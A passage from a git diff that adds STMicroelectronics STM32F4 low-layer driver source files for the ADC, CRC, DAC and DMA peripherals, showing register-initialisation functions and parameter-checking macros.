instance */ + ADC_InitStruct->Resolution = LL_ADC_RESOLUTION_12B; + ADC_InitStruct->DataAlignment = LL_ADC_DATA_ALIGN_RIGHT; + + /* Enable scan mode to have a generic behavior with ADC of other */ + /* STM32 families, without this setting available: */ + /* ADC group regular sequencer and ADC group injected sequencer depend */ + /* only of their own configuration. */ + ADC_InitStruct->SequencersScanMode = LL_ADC_SEQ_SCAN_ENABLE; + +} + +/** + * @brief Initialize some features of ADC group regular. + * @note These parameters have an impact on ADC scope: ADC group regular. + * Refer to corresponding unitary functions into + * @ref ADC_LL_EF_Configuration_ADC_Group_Regular + * (functions with prefix "REG"). + * @note The setting of these parameters by function @ref LL_ADC_Init() + * is conditioned to ADC state: + * ADC instance must be disabled. + * This condition is applied to all ADC features, for efficiency + * and compatibility over all STM32 families. However, the different + * features can be set under different ADC state conditions + * (setting possible with ADC enabled without conversion on going, + * ADC enabled with conversion on going, ...) + * Each feature can be updated afterwards with a unitary function + * and potentially with ADC in a different state than disabled, + * refer to description of each function for setting + * conditioned to ADC state. + * @note After using this function, other features must be configured + * using LL unitary functions. + * The minimum configuration remaining to be done is: + * - Set ADC group regular or group injected sequencer: + * map channel on the selected sequencer rank. + * Refer to function @ref LL_ADC_REG_SetSequencerRanks(). + * - Set ADC channel sampling time + * Refer to function LL_ADC_SetChannelSamplingTime(); + * @param ADCx ADC instance + * @param ADC_REG_InitStruct Pointer to a @ref LL_ADC_REG_InitTypeDef structure + * @retval An ErrorStatus enumeration value: + * - SUCCESS: ADC registers are initialized + * - ERROR: ADC registers are not initialized + */ +ErrorStatus LL_ADC_REG_Init(ADC_TypeDef *ADCx, LL_ADC_REG_InitTypeDef *ADC_REG_InitStruct) +{ + ErrorStatus status = SUCCESS; + + /* Check the parameters */ + assert_param(IS_ADC_ALL_INSTANCE(ADCx)); + assert_param(IS_LL_ADC_REG_TRIG_SOURCE(ADC_REG_InitStruct->TriggerSource)); + assert_param(IS_LL_ADC_REG_SEQ_SCAN_LENGTH(ADC_REG_InitStruct->SequencerLength)); + if(ADC_REG_InitStruct->SequencerLength != LL_ADC_REG_SEQ_SCAN_DISABLE) + { + assert_param(IS_LL_ADC_REG_SEQ_SCAN_DISCONT_MODE(ADC_REG_InitStruct->SequencerDiscont)); + } + assert_param(IS_LL_ADC_REG_CONTINUOUS_MODE(ADC_REG_InitStruct->ContinuousMode)); + assert_param(IS_LL_ADC_REG_DMA_TRANSFER(ADC_REG_InitStruct->DMATransfer)); + + /* ADC group regular continuous mode and discontinuous mode */ + /* can not be enabled simultenaeously */ + assert_param((ADC_REG_InitStruct->ContinuousMode == LL_ADC_REG_CONV_SINGLE) + || (ADC_REG_InitStruct->SequencerDiscont == LL_ADC_REG_SEQ_DISCONT_DISABLE)); + + /* Note: Hardware constraint (refer to description of this function): */ + /* ADC instance must be disabled. */ + if(LL_ADC_IsEnabled(ADCx) == 0UL) + { + /* Configuration of ADC hierarchical scope: */ + /* - ADC group regular */ + /* - Set ADC group regular trigger source */ + /* - Set ADC group regular sequencer length */ + /* - Set ADC group regular sequencer discontinuous mode */ + /* - Set ADC group regular continuous mode */ + /* - Set ADC group regular conversion data transfer: no transfer or */ + /* transfer by DMA, and DMA requests mode */ + /* Note: On this STM32 series, ADC trigger edge is set when starting */ + /* ADC conversion. */ + /* Refer to function @ref LL_ADC_REG_StartConversionExtTrig(). */ + if(ADC_REG_InitStruct->SequencerLength != LL_ADC_REG_SEQ_SCAN_DISABLE) + { + MODIFY_REG(ADCx->CR1, + ADC_CR1_DISCEN + | ADC_CR1_DISCNUM + , + ADC_REG_InitStruct->SequencerDiscont + ); + } + else + { + MODIFY_REG(ADCx->CR1, + ADC_CR1_DISCEN + | ADC_CR1_DISCNUM + , + LL_ADC_REG_SEQ_DISCONT_DISABLE + ); + } + + MODIFY_REG(ADCx->CR2, + ADC_CR2_EXTSEL + | ADC_CR2_EXTEN + | ADC_CR2_CONT + | ADC_CR2_DMA + | ADC_CR2_DDS + , + (ADC_REG_InitStruct->TriggerSource & ADC_CR2_EXTSEL) + | ADC_REG_InitStruct->ContinuousMode + | ADC_REG_InitStruct->DMATransfer + ); + + /* Set ADC group regular sequencer length and scan direction */ + /* Note: Hardware constraint (refer to description of this function): */ + /* Note: If ADC instance feature scan mode is disabled */ + /* (refer to ADC instance initialization structure */ + /* parameter @ref SequencersScanMode */ + /* or function @ref LL_ADC_SetSequencersScanMode() ), */ + /* this parameter is discarded. */ + LL_ADC_REG_SetSequencerLength(ADCx, ADC_REG_InitStruct->SequencerLength); + } + else + { + /* Initialization error: ADC instance is not disabled. */ + status = ERROR; + } + return status; +} + +/** + * @brief Set each @ref LL_ADC_REG_InitTypeDef field to default value. + * @param ADC_REG_InitStruct Pointer to a @ref LL_ADC_REG_InitTypeDef structure + * whose fields will be set to default values. + * @retval None + */ +void LL_ADC_REG_StructInit(LL_ADC_REG_InitTypeDef *ADC_REG_InitStruct) +{ + /* Set ADC_REG_InitStruct fields to default values */ + /* Set fields of ADC group regular */ + /* Note: On this STM32 series, ADC trigger edge is set when starting */ + /* ADC conversion. */ + /* Refer to function @ref LL_ADC_REG_StartConversionExtTrig(). */ + ADC_REG_InitStruct->TriggerSource = LL_ADC_REG_TRIG_SOFTWARE; + ADC_REG_InitStruct->SequencerLength = LL_ADC_REG_SEQ_SCAN_DISABLE; + ADC_REG_InitStruct->SequencerDiscont = LL_ADC_REG_SEQ_DISCONT_DISABLE; + ADC_REG_InitStruct->ContinuousMode = LL_ADC_REG_CONV_SINGLE; + ADC_REG_InitStruct->DMATransfer = LL_ADC_REG_DMA_TRANSFER_NONE; +} + +/** + * @brief Initialize some features of ADC group injected. + * @note These parameters have an impact on ADC scope: ADC group injected. + * Refer to corresponding unitary functions into + * @ref ADC_LL_EF_Configuration_ADC_Group_Regular + * (functions with prefix "INJ"). + * @note The setting of these parameters by function @ref LL_ADC_Init() + * is conditioned to ADC state: + * ADC instance must be disabled. + * This condition is applied to all ADC features, for efficiency + * and compatibility over all STM32 families. However, the different + * features can be set under different ADC state conditions + * (setting possible with ADC enabled without conversion on going, + * ADC enabled with conversion on going, ...) + * Each feature can be updated afterwards with a unitary function + * and potentially with ADC in a different state than disabled, + * refer to description of each function for setting + * conditioned to ADC state. + * @note After using this function, other features must be configured + * using LL unitary functions. + * The minimum configuration remaining to be done is: + * - Set ADC group injected sequencer: + * map channel on the selected sequencer rank. + * Refer to function @ref LL_ADC_INJ_SetSequencerRanks(). + * - Set ADC channel sampling time + * Refer to function LL_ADC_SetChannelSamplingTime(); + * @param ADCx ADC instance + * @param ADC_INJ_InitStruct Pointer to a @ref LL_ADC_INJ_InitTypeDef structure + * @retval An ErrorStatus enumeration value: + * - SUCCESS: ADC registers are initialized + * - ERROR: ADC registers are not initialized + */ +ErrorStatus LL_ADC_INJ_Init(ADC_TypeDef *ADCx, LL_ADC_INJ_InitTypeDef *ADC_INJ_InitStruct) +{ + ErrorStatus status = SUCCESS; + + /* Check the parameters */ + assert_param(IS_ADC_ALL_INSTANCE(ADCx)); + assert_param(IS_LL_ADC_INJ_TRIG_SOURCE(ADC_INJ_InitStruct->TriggerSource)); + assert_param(IS_LL_ADC_INJ_SEQ_SCAN_LENGTH(ADC_INJ_InitStruct->SequencerLength)); + if(ADC_INJ_InitStruct->SequencerLength != LL_ADC_INJ_SEQ_SCAN_DISABLE) + { + assert_param(IS_LL_ADC_INJ_SEQ_SCAN_DISCONT_MODE(ADC_INJ_InitStruct->SequencerDiscont)); + } + assert_param(IS_LL_ADC_INJ_TRIG_AUTO(ADC_INJ_InitStruct->TrigAuto)); + + /* Note: Hardware constraint (refer to description of this function): */ + /* ADC instance must be disabled. */ + if(LL_ADC_IsEnabled(ADCx) == 0UL) + { + /* Configuration of ADC hierarchical scope: */ + /* - ADC group injected */ + /* - Set ADC group injected trigger source */ + /* - Set ADC group injected sequencer length */ + /* - Set ADC group injected sequencer discontinuous mode */ + /* - Set ADC group injected conversion trigger: independent or */ + /* from ADC group regular */ + /* Note: On this STM32 series, ADC trigger edge is set when starting */ + /* ADC conversion. */ + /* Refer to function @ref LL_ADC_INJ_StartConversionExtTrig(). */ + if(ADC_INJ_InitStruct->SequencerLength != LL_ADC_REG_SEQ_SCAN_DISABLE) + { + MODIFY_REG(ADCx->CR1, + ADC_CR1_JDISCEN + | ADC_CR1_JAUTO + , + ADC_INJ_InitStruct->SequencerDiscont + | ADC_INJ_InitStruct->TrigAuto + ); + } + else + { + MODIFY_REG(ADCx->CR1, + ADC_CR1_JDISCEN + | ADC_CR1_JAUTO + , + LL_ADC_REG_SEQ_DISCONT_DISABLE + | ADC_INJ_InitStruct->TrigAuto + ); + } + + MODIFY_REG(ADCx->CR2, + ADC_CR2_JEXTSEL + | ADC_CR2_JEXTEN + , + (ADC_INJ_InitStruct->TriggerSource & ADC_CR2_JEXTSEL) + ); + + /* Note: Hardware constraint (refer to description of this function): */ + /* Note: If ADC instance feature scan mode is disabled */ + /* (refer to ADC instance initialization structure */ + /* parameter @ref SequencersScanMode */ + /* or function @ref LL_ADC_SetSequencersScanMode() ), */ + /* this parameter is discarded. */ + LL_ADC_INJ_SetSequencerLength(ADCx, ADC_INJ_InitStruct->SequencerLength); + } + else + { + /* Initialization error: ADC instance is not disabled. */ + status = ERROR; + } + return status; +} + +/** + * @brief Set each @ref LL_ADC_INJ_InitTypeDef field to default value. + * @param ADC_INJ_InitStruct Pointer to a @ref LL_ADC_INJ_InitTypeDef structure + * whose fields will be set to default values. + * @retval None + */ +void LL_ADC_INJ_StructInit(LL_ADC_INJ_InitTypeDef *ADC_INJ_InitStruct) +{ + /* Set ADC_INJ_InitStruct fields to default values */ + /* Set fields of ADC group injected */ + ADC_INJ_InitStruct->TriggerSource = LL_ADC_INJ_TRIG_SOFTWARE; + ADC_INJ_InitStruct->SequencerLength = LL_ADC_INJ_SEQ_SCAN_DISABLE; + ADC_INJ_InitStruct->SequencerDiscont = LL_ADC_INJ_SEQ_DISCONT_DISABLE; + ADC_INJ_InitStruct->TrigAuto = LL_ADC_INJ_TRIG_INDEPENDENT; +} + +/** + * @} + */ + +/** + * @} + */ + +/** + * @} + */ + +#endif /* ADC1 || ADC2 || ADC3 */ + +/** + * @} + */ + +#endif /* USE_FULL_LL_DRIVER */ + +/************************ (C) COPYRIGHT STMicroelectronics *****END OF FILE****/ diff --git a/body/board/inc/STM32F4xx_HAL_Driver/Src/stm32f4xx_ll_crc.c b/body/board/inc/STM32F4xx_HAL_Driver/Src/stm32f4xx_ll_crc.c new file mode 100644 index 000000000..372e2f272 --- /dev/null +++ b/body/board/inc/STM32F4xx_HAL_Driver/Src/stm32f4xx_ll_crc.c @@ -0,0 +1,107 @@ +/** + ****************************************************************************** + * @file stm32f4xx_ll_crc.c + * @author MCD Application Team + * @brief CRC LL module driver. + ****************************************************************************** + * @attention + * + *

© Copyright (c) 2016 STMicroelectronics. + * All rights reserved.

+ * + * This software component is licensed by ST under BSD 3-Clause license, + * the "License"; You may not use this file except in compliance with the + * License. You may obtain a copy of the License at: + * opensource.org/licenses/BSD-3-Clause + * + ****************************************************************************** + */ +#if defined(USE_FULL_LL_DRIVER) + +/* Includes ------------------------------------------------------------------*/ +#include "stm32f4xx_ll_crc.h" +#include "stm32f4xx_ll_bus.h" + +#ifdef USE_FULL_ASSERT +#include "stm32_assert.h" +#else +#define assert_param(expr) ((void)0U) +#endif/* USE_FULL_ASSERT */ + +/** @addtogroup STM32F4xx_LL_Driver + * @{ + */ + +#if defined (CRC) + +/** @addtogroup CRC_LL + * @{ + */ + +/* Private types -------------------------------------------------------------*/ +/* Private variables ---------------------------------------------------------*/ +/* Private constants ---------------------------------------------------------*/ +/* Private macros ------------------------------------------------------------*/ +/* Private function prototypes -----------------------------------------------*/ + +/* Exported functions --------------------------------------------------------*/ +/** @addtogroup CRC_LL_Exported_Functions + * @{ + */ + +/** @addtogroup CRC_LL_EF_Init + * @{ + */ + +/** + * @brief De-initialize CRC registers (Registers restored to their default values). + * @param CRCx CRC Instance + * @retval An ErrorStatus enumeration value: + * - SUCCESS: CRC registers are de-initialized + * - ERROR: CRC registers are not de-initialized + */ +ErrorStatus LL_CRC_DeInit(CRC_TypeDef *CRCx) +{ + ErrorStatus status = SUCCESS; + + /* Check the parameters */ + assert_param(IS_CRC_ALL_INSTANCE(CRCx)); + + if (CRCx == CRC) + { + /* Force CRC reset */ + LL_AHB1_GRP1_ForceReset(LL_AHB1_GRP1_PERIPH_CRC); + + /* Release CRC reset */ + LL_AHB1_GRP1_ReleaseReset(LL_AHB1_GRP1_PERIPH_CRC); + } + else + { + status = ERROR; + } + + return (status); +} + +/** + * @} + */ + +/** + * @} + */ + +/** + * @} + */ + +#endif /* defined (CRC) */ + +/** + * @} + */ + +#endif /* USE_FULL_LL_DRIVER */ + +/************************ (C) COPYRIGHT STMicroelectronics *****END OF FILE****/ + diff --git a/body/board/inc/STM32F4xx_HAL_Driver/Src/stm32f4xx_ll_dac.c b/body/board/inc/STM32F4xx_HAL_Driver/Src/stm32f4xx_ll_dac.c new file mode 100644 index 000000000..1316504b4 --- /dev/null +++ b/body/board/inc/STM32F4xx_HAL_Driver/Src/stm32f4xx_ll_dac.c @@ -0,0 +1,282 @@ +/** + ****************************************************************************** + * @file stm32f4xx_ll_dac.c + * @author MCD Application Team + * @brief DAC LL module driver + ****************************************************************************** + * @attention + * + *

© Copyright (c) 2016 STMicroelectronics. + * All rights reserved.

+ * + * This software component is licensed by ST under BSD 3-Clause license, + * the "License"; You may not use this file except in compliance with the + * License. You may obtain a copy of the License at: + * opensource.org/licenses/BSD-3-Clause + * + ****************************************************************************** + */ +#if defined(USE_FULL_LL_DRIVER) + +/* Includes ------------------------------------------------------------------*/ +#include "stm32f4xx_ll_dac.h" +#include "stm32f4xx_ll_bus.h" + +#ifdef USE_FULL_ASSERT +#include "stm32_assert.h" +#else +#define assert_param(expr) ((void)0U) +#endif /* USE_FULL_ASSERT */ + +/** @addtogroup STM32F4xx_LL_Driver + * @{ + */ + +#if defined(DAC) + +/** @addtogroup DAC_LL DAC + * @{ + */ + +/* Private types -------------------------------------------------------------*/ +/* Private variables ---------------------------------------------------------*/ +/* Private constants ---------------------------------------------------------*/ +/* Private macros ------------------------------------------------------------*/ + +/** @addtogroup DAC_LL_Private_Macros + * @{ + */ +#if defined(DAC_CHANNEL2_SUPPORT) +#define IS_LL_DAC_CHANNEL(__DACX__, __DAC_CHANNEL__) \ + ( \ + ((__DAC_CHANNEL__) == LL_DAC_CHANNEL_1) \ + || ((__DAC_CHANNEL__) == LL_DAC_CHANNEL_2) \ + ) +#else +#define IS_LL_DAC_CHANNEL(__DACX__, __DAC_CHANNEL__) \ + ( \ + ((__DAC_CHANNEL__) == LL_DAC_CHANNEL_1) \ + ) +#endif /* DAC_CHANNEL2_SUPPORT */ + +#define IS_LL_DAC_TRIGGER_SOURCE(__TRIGGER_SOURCE__) \ + ( ((__TRIGGER_SOURCE__) == LL_DAC_TRIG_SOFTWARE) \ + || ((__TRIGGER_SOURCE__) == LL_DAC_TRIG_EXT_TIM2_TRGO) \ + || ((__TRIGGER_SOURCE__) == LL_DAC_TRIG_EXT_TIM4_TRGO) \ + || ((__TRIGGER_SOURCE__) == LL_DAC_TRIG_EXT_TIM5_TRGO) \ + || ((__TRIGGER_SOURCE__) == LL_DAC_TRIG_EXT_TIM6_TRGO) \ + || ((__TRIGGER_SOURCE__) == LL_DAC_TRIG_EXT_TIM7_TRGO) \ + || ((__TRIGGER_SOURCE__) == LL_DAC_TRIG_EXT_TIM8_TRGO) \ + || ((__TRIGGER_SOURCE__) == LL_DAC_TRIG_EXT_EXTI_LINE9) \ + ) + +#define IS_LL_DAC_WAVE_AUTO_GENER_MODE(__WAVE_AUTO_GENERATION_MODE__) \ + ( ((__WAVE_AUTO_GENERATION_MODE__) == LL_DAC_WAVE_AUTO_GENERATION_NONE) \ + || ((__WAVE_AUTO_GENERATION_MODE__) == LL_DAC_WAVE_AUTO_GENERATION_NOISE) \ + || ((__WAVE_AUTO_GENERATION_MODE__) == LL_DAC_WAVE_AUTO_GENERATION_TRIANGLE) \ + ) + +#define IS_LL_DAC_WAVE_AUTO_GENER_CONFIG(__WAVE_AUTO_GENERATION_MODE__, __WAVE_AUTO_GENERATION_CONFIG__) \ + ( (((__WAVE_AUTO_GENERATION_MODE__) == LL_DAC_WAVE_AUTO_GENERATION_NOISE) \ + && ( ((__WAVE_AUTO_GENERATION_CONFIG__) == LL_DAC_NOISE_LFSR_UNMASK_BIT0) \ + || ((__WAVE_AUTO_GENERATION_CONFIG__) == LL_DAC_NOISE_LFSR_UNMASK_BITS1_0) \ + || ((__WAVE_AUTO_GENERATION_CONFIG__) == LL_DAC_NOISE_LFSR_UNMASK_BITS2_0) \ + || ((__WAVE_AUTO_GENERATION_CONFIG__) == LL_DAC_NOISE_LFSR_UNMASK_BITS3_0) \ + || ((__WAVE_AUTO_GENERATION_CONFIG__) == LL_DAC_NOISE_LFSR_UNMASK_BITS4_0) \ + || ((__WAVE_AUTO_GENERATION_CONFIG__) == LL_DAC_NOISE_LFSR_UNMASK_BITS5_0) \ + || ((__WAVE_AUTO_GENERATION_CONFIG__) == LL_DAC_NOISE_LFSR_UNMASK_BITS6_0) \ + || ((__WAVE_AUTO_GENERATION_CONFIG__) == LL_DAC_NOISE_LFSR_UNMASK_BITS7_0) \ + || ((__WAVE_AUTO_GENERATION_CONFIG__) == LL_DAC_NOISE_LFSR_UNMASK_BITS8_0) \ + || ((__WAVE_AUTO_GENERATION_CONFIG__) == LL_DAC_NOISE_LFSR_UNMASK_BITS9_0) \ + || ((__WAVE_AUTO_GENERATION_CONFIG__) == LL_DAC_NOISE_LFSR_UNMASK_BITS10_0) \ + || ((__WAVE_AUTO_GENERATION_CONFIG__) == LL_DAC_NOISE_LFSR_UNMASK_BITS11_0)) \ + ) \ + ||(((__WAVE_AUTO_GENERATION_MODE__) == LL_DAC_WAVE_AUTO_GENERATION_TRIANGLE) \ + && ( ((__WAVE_AUTO_GENERATION_CONFIG__) == LL_DAC_TRIANGLE_AMPLITUDE_1) \ + || ((__WAVE_AUTO_GENERATION_CONFIG__) == LL_DAC_TRIANGLE_AMPLITUDE_3) \ + || ((__WAVE_AUTO_GENERATION_CONFIG__) == LL_DAC_TRIANGLE_AMPLITUDE_7) \ + || ((__WAVE_AUTO_GENERATION_CONFIG__) == LL_DAC_TRIANGLE_AMPLITUDE_15) \ + || ((__WAVE_AUTO_GENERATION_CONFIG__) == LL_DAC_TRIANGLE_AMPLITUDE_31) \ + || ((__WAVE_AUTO_GENERATION_CONFIG__) == LL_DAC_TRIANGLE_AMPLITUDE_63) \ + || ((__WAVE_AUTO_GENERATION_CONFIG__) == LL_DAC_TRIANGLE_AMPLITUDE_127) \ + || ((__WAVE_AUTO_GENERATION_CONFIG__) == LL_DAC_TRIANGLE_AMPLITUDE_255) \ + || ((__WAVE_AUTO_GENERATION_CONFIG__) == LL_DAC_TRIANGLE_AMPLITUDE_511) \ + || ((__WAVE_AUTO_GENERATION_CONFIG__) == LL_DAC_TRIANGLE_AMPLITUDE_1023) \ + || ((__WAVE_AUTO_GENERATION_CONFIG__) == LL_DAC_TRIANGLE_AMPLITUDE_2047) \ + || ((__WAVE_AUTO_GENERATION_CONFIG__) == LL_DAC_TRIANGLE_AMPLITUDE_4095)) \ + ) \ + ) + +#define IS_LL_DAC_OUTPUT_BUFFER(__OUTPUT_BUFFER__) \ + ( ((__OUTPUT_BUFFER__) == LL_DAC_OUTPUT_BUFFER_ENABLE) \ + || ((__OUTPUT_BUFFER__) == LL_DAC_OUTPUT_BUFFER_DISABLE) \ + ) + +/** + * @} + */ + + +/* Private function prototypes -----------------------------------------------*/ + +/* Exported functions --------------------------------------------------------*/ +/** @addtogroup DAC_LL_Exported_Functions + * @{ + */ + +/** @addtogroup DAC_LL_EF_Init + * @{ + */ + +/** + * @brief De-initialize registers of the selected DAC instance + * to their default reset values. + * @param DACx DAC instance + * @retval An ErrorStatus enumeration value: + * - SUCCESS: DAC registers are de-initialized + * - ERROR: not applicable + */ +ErrorStatus LL_DAC_DeInit(DAC_TypeDef *DACx) +{ + /* Check the parameters */ + assert_param(IS_DAC_ALL_INSTANCE(DACx)); + + /* Force reset of DAC clock */ + LL_APB1_GRP1_ForceReset(LL_APB1_GRP1_PERIPH_DAC1); + + /* Release reset of DAC clock */ + LL_APB1_GRP1_ReleaseReset(LL_APB1_GRP1_PERIPH_DAC1); + + return SUCCESS; +} + +/** + * @brief Initialize some features of DAC channel. + * @note @ref LL_DAC_Init() aims to ease basic configuration of a DAC channel. + * Leaving it ready to be enabled and output: + * a level by calling one of + * @ref LL_DAC_ConvertData12RightAligned + * @ref LL_DAC_ConvertData12LeftAligned + * @ref LL_DAC_ConvertData8RightAligned + * or one of the supported autogenerated wave. + * @note This function allows configuration of: + * - Output mode + * - Trigger + * - Wave generation + * @note The setting of these parameters by function @ref LL_DAC_Init() + * is conditioned to DAC state: + * DAC channel must be disabled. + * @param DACx DAC instance + * @param DAC_Channel This parameter can be one of the following values: + * @arg @ref LL_DAC_CHANNEL_1 + * @arg @ref LL_DAC_CHANNEL_2 (1) + * + * (1) On this STM32 serie, parameter not available on all devices. + * Refer to device datasheet for channels availability. + * @param DAC_InitStruct Pointer to a @ref LL_DAC_InitTypeDef structure + * @retval An ErrorStatus enumeration value: + * - SUCCESS: DAC registers are initialized + * - ERROR: DAC registers are not initialized + */ +ErrorStatus LL_DAC_Init(DAC_TypeDef *DACx, uint32_t DAC_Channel, LL_DAC_InitTypeDef *DAC_InitStruct) +{ + ErrorStatus status = SUCCESS; + + /* Check the parameters */ + assert_param(IS_DAC_ALL_INSTANCE(DACx)); + assert_param(IS_LL_DAC_CHANNEL(DACx, DAC_Channel)); + assert_param(IS_LL_DAC_TRIGGER_SOURCE(DAC_InitStruct->TriggerSource)); + assert_param(IS_LL_DAC_OUTPUT_BUFFER(DAC_InitStruct->OutputBuffer)); + assert_param(IS_LL_DAC_WAVE_AUTO_GENER_MODE(DAC_InitStruct->WaveAutoGeneration)); + if (DAC_InitStruct->WaveAutoGeneration != LL_DAC_WAVE_AUTO_GENERATION_NONE) + { + assert_param(IS_LL_DAC_WAVE_AUTO_GENER_CONFIG(DAC_InitStruct->WaveAutoGeneration, + DAC_InitStruct->WaveAutoGenerationConfig)); + } + + /* Note: Hardware constraint (refer to description of this function) */ + /* DAC instance must be disabled. */ + if (LL_DAC_IsEnabled(DACx, DAC_Channel) == 0UL) + { + /* Configuration of DAC channel: */ + /* - TriggerSource */ + /* - WaveAutoGeneration */ + /* - OutputBuffer */ + /* - OutputMode */ + if (DAC_InitStruct->WaveAutoGeneration != LL_DAC_WAVE_AUTO_GENERATION_NONE) + { + MODIFY_REG(DACx->CR, + (DAC_CR_TSEL1 + | DAC_CR_WAVE1 + | DAC_CR_MAMP1 + | DAC_CR_BOFF1 + ) << (DAC_Channel & DAC_CR_CHX_BITOFFSET_MASK) + , + (DAC_InitStruct->TriggerSource + | DAC_InitStruct->WaveAutoGeneration + | DAC_InitStruct->WaveAutoGenerationConfig + | DAC_InitStruct->OutputBuffer + ) << (DAC_Channel & DAC_CR_CHX_BITOFFSET_MASK) + ); + } + else + { + MODIFY_REG(DACx->CR, + (DAC_CR_TSEL1 + | DAC_CR_WAVE1 + | DAC_CR_BOFF1 + ) << (DAC_Channel & DAC_CR_CHX_BITOFFSET_MASK) + , + (DAC_InitStruct->TriggerSource + | LL_DAC_WAVE_AUTO_GENERATION_NONE + | DAC_InitStruct->OutputBuffer + ) << (DAC_Channel & DAC_CR_CHX_BITOFFSET_MASK) + ); + } + } + else + { + /* Initialization error: DAC instance is not disabled. */ + status = ERROR; + } + return status; +} + +/** + * @brief Set each @ref LL_DAC_InitTypeDef field to default value. + * @param DAC_InitStruct pointer to a @ref LL_DAC_InitTypeDef structure + * whose fields will be set to default values. + * @retval None + */ +void LL_DAC_StructInit(LL_DAC_InitTypeDef *DAC_InitStruct) +{ + /* Set DAC_InitStruct fields to default values */ + DAC_InitStruct->TriggerSource = LL_DAC_TRIG_SOFTWARE; + DAC_InitStruct->WaveAutoGeneration = LL_DAC_WAVE_AUTO_GENERATION_NONE; + /* Note: Parameter discarded if wave auto generation is disabled, */ + /* set anyway to its default value. */ + DAC_InitStruct->WaveAutoGenerationConfig = LL_DAC_NOISE_LFSR_UNMASK_BIT0; + DAC_InitStruct->OutputBuffer = LL_DAC_OUTPUT_BUFFER_ENABLE; +} + +/** + * @} + */ + +/** + * @} + */ + +/** + * @} + */ + +#endif /* DAC */ + +/** + * @} + */ + +#endif /* USE_FULL_LL_DRIVER */ + +/************************ (C) COPYRIGHT STMicroelectronics *****END OF FILE****/ diff --git a/body/board/inc/STM32F4xx_HAL_Driver/Src/stm32f4xx_ll_dma.c b/body/board/inc/STM32F4xx_HAL_Driver/Src/stm32f4xx_ll_dma.c new file mode 100644 index 000000000..e4cbae4c9 --- /dev/null +++ b/body/board/inc/STM32F4xx_HAL_Driver/Src/stm32f4xx_ll_dma.c @@ -0,0 +1,425 @@ +/** + ****************************************************************************** + * @file stm32f4xx_ll_dma.c + * @author MCD Application Team + * @brief DMA LL module driver. + ****************************************************************************** + * @attention + * + *

© Copyright (c) 2017 STMicroelectronics. + * All rights reserved.

+ * + * This software component is licensed by ST under BSD 3-Clause license, + * the "License"; You may not use this file except in compliance with the + * License. You may obtain a copy of the License at: + * opensource.org/licenses/BSD-3-Clause + * + ****************************************************************************** + */ +#if defined(USE_FULL_LL_DRIVER) + +/* Includes ------------------------------------------------------------------*/ +#include "stm32f4xx_ll_dma.h" +#include "stm32f4xx_ll_bus.h" +#ifdef USE_FULL_ASSERT +#include "stm32_assert.h" +#else +#define assert_param(expr) ((void)0U) +#endif + +/** @addtogroup STM32F4xx_LL_Driver + * @{ + */ + +#if defined (DMA1) || defined (DMA2) + +/** @defgroup DMA_LL DMA + * @{ + */ + +/* Private types -------------------------------------------------------------*/ +/* Private variables ---------------------------------------------------------*/ +/* Private constants ---------------------------------------------------------*/ +/* Private macros ------------------------------------------------------------*/ +/** @addtogroup DMA_LL_Private_Macros + * @{ + */ +#define IS_LL_DMA_DIRECTION(__VALUE__) (((__VALUE__) == LL_DMA_DIRECTION_PERIPH_TO_MEMORY) || \ + ((__VALUE__) == LL_DMA_DIRECTION_MEMORY_TO_PERIPH) || \ + ((__VALUE__) == LL_DMA_DIRECTION_MEMORY_TO_MEMORY)) + +#define IS_LL_DMA_MODE(__VALUE__) (((__VALUE__) == LL_DMA_MODE_NORMAL) || \ + ((__VALUE__) == LL_DMA_MODE_CIRCULAR) || \ + ((__VALUE__) == LL_DMA_MODE_PFCTRL)) + +#define IS_LL_DMA_PERIPHINCMODE(__VALUE__) (((__VALUE__) == LL_DMA_PERIPH_INCREMENT) || \ + ((__VALUE__) == LL_DMA_PERIPH_NOINCREMENT)) + +#define IS_LL_DMA_MEMORYINCMODE(__VALUE__) (((__VALUE__) == LL_DMA_MEMORY_INCREMENT) || \ + ((__VALUE__) == LL_DMA_MEMORY_NOINCREMENT)) + +#define IS_LL_DMA_PERIPHDATASIZE(__VALUE__) (((__VALUE__) == LL_DMA_PDATAALIGN_BYTE) || \ + ((__VALUE__) == LL_DMA_PDATAALIGN_HALFWORD) || \ + ((__VALUE__) == LL_DMA_PDATAALIGN_WORD)) + +#define IS_LL_DMA_MEMORYDATASIZE(__VALUE__) (((__VALUE__) == LL_DMA_MDATAALIGN_BYTE) || \ + ((__VALUE__) == LL_DMA_MDATAALIGN_HALFWORD) || \ + ((__VALUE__) == LL_DMA_MDATAALIGN_WORD)) + +#define IS_LL_DMA_NBDATA(__VALUE__) ((__VALUE__) <= 0x0000FFFFU) + +#define IS_LL_DMA_CHANNEL(__VALUE__) (((__VALUE__) == LL_DMA_CHANNEL_0) || \ + ((__VALUE__) == LL_DMA_CHANNEL_1) || \ + ((__VALUE__) == LL_DMA_CHANNEL_2) || \ + ((__VALUE__) == LL_DMA_CHANNEL_3) || \ + ((__VALUE__) == LL_DMA_CHANNEL_4) || \ + ((__VALUE__) == LL_DMA_CHANNEL_5) || \ + ((__VALUE__) == LL_DMA_CHANNEL_6) || \ + ((__VALUE__) == LL_DMA_CHANNEL_7)) + +#define IS_LL_DMA_PRIORITY(__VALUE__) (((__VALUE__) == LL_DMA_PRIORITY_LOW) || \ + ((__VALUE__) == LL_DMA_PRIORITY_MEDIUM) || \ + ((__VALUE__) == LL_DMA_PRIORITY_HIGH) || \ + ((__VALUE__) == LL_DMA_PRIORITY_VERYHIGH)) + +#define IS_LL_DMA_ALL_STREAM_INSTANCE(INSTANCE, STREAM) ((((INSTANCE) == DMA1) && \ + (((STREAM) == LL_DMA_STREAM_0) || \ + ((STREAM) == LL_DMA_STREAM_1) || \ + ((STREAM) == LL_DMA_STREAM_2) || \ + ((STREAM) == LL_DMA_STREAM_3) || \ + ((STREAM) == LL_DMA_STREAM_4) || \ + ((STREAM) == LL_DMA_STREAM_5) || \ + ((STREAM) == LL_DMA_STREAM_6) || \ + ((STREAM) == LL_DMA_STREAM_7) || \ + ((STREAM) == LL_DMA_STREAM_ALL))) ||\ + (((INSTANCE) == DMA2) && \ + (((STREAM) == LL_DMA_STREAM_0) || \ + ((STREAM) == LL_DMA_STREAM_1) || \ + ((STREAM) == LL_DMA_STREAM_2) || \ + ((STREAM) == LL_DMA_STREAM_3) || \ + ((STREAM) == LL_DMA_STREAM_4) || \ + ((STREAM) == LL_DMA_STREAM_5) || \ + ((STREAM) == LL_DMA_STREAM_6) || \ + ((STREAM) == LL_DMA_STREAM_7) || \ + ((STREAM) == LL_DMA_STREAM_ALL)))) + +#define 